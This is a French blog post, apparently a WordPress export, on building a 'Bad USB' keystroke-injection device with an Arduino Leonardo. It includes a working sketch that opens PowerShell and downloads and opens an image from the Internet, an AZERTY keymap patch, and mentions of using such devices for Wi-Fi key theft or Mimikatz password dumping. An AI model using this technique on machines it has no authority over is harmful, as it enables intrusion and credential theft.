![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/bad-usb.png\")
<\/p>\nDans le petit monde des \u00ab\u00a0Bad USB\u00a0\u00bb j’ai voulu test\u00e9 une version bas\u00e9e sur un chipset Arduino :<\/p>\n
<\/p>\n
Le principe de base reste le m\u00eame que pour la c\u00e9l\u00e8bre Rubber Ducky : la clef USB est en r\u00e9alit\u00e9 un p\u00e9riph\u00e9rique USB de type HID (Human Interface Device), un clavier, qui une fois reconnu par le syst\u00e8me envoie la s\u00e9quence de frappes clavier pr\u00e9vue par le script de l’attaquant.<\/p>\n
Le script peut \u00eatre tout et n’importe quoi, d’un simple Hello World , au vol de cl\u00e9 Wifi en passant par la r\u00e9cup\u00e9ration des mots de passe Windows via Mimikatz.<\/p>\n
En pratique cela se passe comment ?<\/p>\n
Il est n\u00e9cessaire de disposer de l’IDE Arduino, au moment des tests je disposais de la version 1.8.5.<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-1.png\")
<\/p>\n
Ensuite il faut configurer l’IDE pour lui indiquer qu’il s’agit d’une carte de type Arduino Leonardo.<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-2.png\")
<\/p>\n
Pour le script, rien de tr\u00e8s compliqu\u00e9.<\/p>\n
Ci-joint un petit exemple pour Windows dont le but est de t\u00e9l\u00e9charger une image sur Internet puis de l’afficher \u00e0 l’\u00e9cran :<\/p>\n
#include \"Keyboard.h\"\r\n#include \"Mouse.h\"\r\n\r\nvoid typeKey(int key)\r\n{\r\n Keyboard.press(key);\r\n delay(100);\r\n Keyboard.release(key);\r\n}\r\n\r\n\/* Init function *\/\r\nvoid setup()\r\n{\r\n \/\/ Begining the Keyboard stream\r\n Keyboard.begin();\r\n \/\/ Wait 500ms\r\n delay(5000);\r\n \r\n Keyboard.press(KEY_LEFT_GUI);\r\n Keyboard.releaseAll();\r\n\r\n delay(200);\r\n Keyboard.print(\"powershell\");\r\n delay(1500);\r\n typeKey(KEY_RETURN);\r\n delay(1000);\r\n Keyboard.print(\"$client = new-object System.Net.WebClient\");\r\n typeKey(KEY_RETURN);\r\n delay(150);\r\n Keyboard.print(\"$client.DownloadFile('https:\/\/cdn.pixabay.com\/photo\/2018\/05\/07\/10\/48\/husky-3380548_960_720.jpg','C:\/Temp\/cat.jpg')\");\r\n typeKey(KEY_RETURN);\r\n delay(150);\r\n \/\/Keyboard.print(\"gci -Path 'C:\/Temp\/' -Filter 'cat.jpg' | ii ; exit\");\r\n \r\n Keyboard.print(\"gci -Path 'C:\/Temp\/' -Filter 'cat.jpg'\");\r\n typeKey(KEY_RETURN);\r\n delay(150);\r\n Keyboard.print(\"ii 'C:\/Temp\/cat.jpg','C:\/Temp\/cat.jpg' ; exit \");\r\n delay(150);\r\n typeKey(KEY_RETURN);\r\n \r\n \/\/Keyboard.press(KEY_MENU);\r\n \/\/ Ending stream\r\n Keyboard.end();\r\n}\r\n\r\n\/* Unused endless loop *\/\r\nvoid loop() {}\r\n<\/pre>\nEnsuite il n’y a plus qu’\u00e0 envoyer le script, que dis-je t\u00e9l\u00e9verser le script, dans la clef USB :<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-3.png\")
<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-4.png\")
<\/p>\n
<\/p>\n
Et le tour est jou\u00e9 ! Le script se d\u00e9clenche automatiquement (un peu comme un autorun m\u00eame si cela n’a strictement rien \u00e0 voir) :<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-powershell.png\")
<\/p>\n
et voila le r\u00e9sultat \ud83d\ude42<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-ouput.png\")
<\/p>\n
Petit souci que j’ai rencontr\u00e9 : de base le mapping des touches est pr\u00e9vue pour un clavier QWERTY…Donc autant dire que la premi\u00e8re fois le script a fait n’importe quoi.<\/p>\n
En cherchant un peu j’ai localis\u00e9 le coupable : il s ‘agit du fichier Keyboard.cpp dans Arduino. Il suffit soit de l’adapter, soit de trouver une version pour AZERTY toute faite sur Internet.<\/p>\n
La modification porte sur le tableau _asciimap, ci-joint une version pour claviers AZERTY :<\/p>\n
const uint8_t _asciimap[128] =\r\n{\r\n\t0x00, \/\/ NUL\r\n\t0x00, \/\/ SOH\r\n\t0x00, \/\/ STX\r\n\t0x00, \/\/ ETX\r\n\t0x00, \/\/ EOT\r\n\t0x00, \/\/ ENQ\r\n\t0x00, \/\/ ACK \r\n\t0x00, \/\/ BEL\r\n\t0x2a,\t\t\t\/\/ BS\tBackspace\r\n\t0x2b,\t\t\t\/\/ TAB\tTab\r\n\t0x28,\t\t\t\/\/ LF\tEnter\r\n\t0x00, \/\/ VT \r\n\t0x00, \/\/ FF \r\n\t0x00, \/\/ CR \r\n\t0x00, \/\/ SO \r\n\t0x00, \/\/ SI \r\n\t0x00, \/\/ DEL\r\n\t0x00, \/\/ DC1\r\n\t0x00, \/\/ DC2\r\n\t0x00, \/\/ DC3\r\n\t0x00, \/\/ DC4\r\n\t0x00, \/\/ NAK\r\n\t0x00, \/\/ SYN\r\n\t0x00, \/\/ ETB\r\n\t0x00, \/\/ CAN\r\n\t0x00, \/\/ EM \r\n\t0x00, \/\/ SUB\r\n\t0x00, \/\/ ESC\r\n\t0x00, \/\/ FS \r\n\t0x00, \/\/ GS \r\n\t0x00, \/\/ RS \r\n\t0x00, \/\/ US \r\n\r\n\t0x2c,\t\t \/\/ ' '\r\n\t0x38,\t \/\/ ! \r\n\t0x20, \/\/ \"\r\n\t0x20, \/\/ # :TODO\r\n\t0x30, \/\/ $\r\n\t0x34|SHIFT, \/\/ %\r\n\t0x1E, \/\/ & \r\n\t0x21, \/\/ '\r\n\t0x22, \/\/ (\r\n\t0x2d, \/\/ )\r\n 0x31, \/\/ * : done\r\n\t0x2e|SHIFT, \/\/ +\r\n\t0x10, \/\/ , \r\n\t0x23, \/\/ -\r\n\t0x36|SHIFT, \/\/ .\r\n\t0x37|SHIFT, \/\/ \/\r\n\t0x27|SHIFT, \/\/ 0\r\n\t0x1e|SHIFT, \/\/ 1\r\n\t0x1f|SHIFT, \/\/ 2\r\n\t0x20|SHIFT, \/\/ 3\r\n\t0x21|SHIFT, \/\/ 4\r\n\t0x22|SHIFT, \/\/ 5\r\n\t0x23|SHIFT, \/\/ 6\r\n\t0x24|SHIFT, \/\/ 7\r\n\t0x25|SHIFT, \/\/ 8\r\n\t0x26|SHIFT, \/\/ 9\r\n\t0x37, \/\/ :\r\n\t0x36, \/\/ ;\r\n\t0x64, \/\/ < Done 0x2e, \/\/ = 0x64|SHIFT, \/\/ > Done\r\n\t0x10|SHIFT, \/\/ ? 0x38 -> 0x10 OK\r\n\t0x1f, \/\/ @ TODO\r\n\t0x14|SHIFT, \/\/ A\r\n\t0x05|SHIFT, \/\/ B\r\n\t0x06|SHIFT, \/\/ C\r\n\t0x07|SHIFT, \/\/ D\r\n\t0x08|SHIFT, \/\/ E\r\n\t0x09|SHIFT, \/\/ F\r\n\t0x0a|SHIFT, \/\/ G\r\n\t0x0b|SHIFT, \/\/ H\r\n\t0x0c|SHIFT, \/\/ I\r\n\t0x0d|SHIFT, \/\/ J\r\n\t0x0e|SHIFT, \/\/ K\r\n\t0x0f|SHIFT, \/\/ L\r\n\t0x33|SHIFT, \/\/ M\r\n\t0x11|SHIFT, \/\/ N\r\n\t0x12|SHIFT, \/\/ O\r\n\t0x13|SHIFT, \/\/ P\r\n\t0x04|SHIFT, \/\/ Q\r\n\t0x15|SHIFT, \/\/ R\r\n\t0x16|SHIFT, \/\/ S\r\n\t0x17|SHIFT, \/\/ T\r\n\t0x18|SHIFT, \/\/ U\r\n\t0x19|SHIFT, \/\/ V\r\n\t0x1d|SHIFT, \/\/ W\r\n\t0x1b|SHIFT, \/\/ X\r\n\t0x1c|SHIFT, \/\/ Y\r\n\t0x1a|SHIFT, \/\/ Z\r\n\t0x0c, \/\/ [ TODO 2F\r\n\t0x31, \/\/ bslash\r\n\t0x0d, \/\/ ] TODO 30\r\n\t0x2F, \/\/ ^\r\n\t0x25, \/\/ _\r\n\t0x35, \/\/ ` TODO\r\n\t0x14, \/\/ a\r\n\t0x05, \/\/ b\r\n\t0x06, \/\/ c\r\n\t0x07, \/\/ d\r\n\t0x08, \/\/ e\r\n\t0x09, \/\/ f\r\n\t0x0a, \/\/ g\r\n\t0x0b, \/\/ h\r\n\t0x0c, \/\/ i\r\n\t0x0d, \/\/ j\r\n\t0x0e, \/\/ k\r\n\t0x0f, \/\/ l\r\n\t0x33, \/\/ m\r\n\t0x11, \/\/ n\r\n\t0x12, \/\/ o\r\n\t0x13, \/\/ p\r\n\t0x04, \/\/ q\r\n\t0x15, \/\/ r\r\n\t0x16, \/\/ s\r\n\t0x17, \/\/ t\r\n\t0x18, \/\/ u\r\n\t0x19, \/\/ v\r\n\t0x1d, \/\/ w\r\n\t0x1b, \/\/ x\r\n\t0x1c, \/\/ y\r\n\t0x1a, \/\/ z\r\n\t0x2f|SHIFT, \/\/ \r\n\t0x31|SHIFT, \/\/ | TODO\r\n\t0x30|SHIFT, \/\/ } TODO\r\n\t0x35|SHIFT, \/\/ ~ TODO\r\n\t0\t\t\t\t\/\/ DEL\r\n};<\/pre>\nEnsuite libre cours \u00e0 votre imagination !<\/p>\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
Dans le petit monde des \u00ab\u00a0Bad USB\u00a0\u00bb j’ai voulu test\u00e9 une version bas\u00e9e sur un chipset Arduino : Le principe de base reste le m\u00eame que pour la c\u00e9l\u00e8bre Rubber Ducky : la clef USB est en r\u00e9alit\u00e9 un p\u00e9riph\u00e9rique USB de type HID (Human Interface Device), un clavier, qui une fois reconnu par le … Continuer la lecture de Bad USB version Arduino<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-330","post","type-post","status-publish","format-standard","hentry","category-usb"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=330"}],"version-history":[{"count":7,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/330\/revisions"}],"predecessor-version":[{"id":346,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/330\/revisions\/346"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}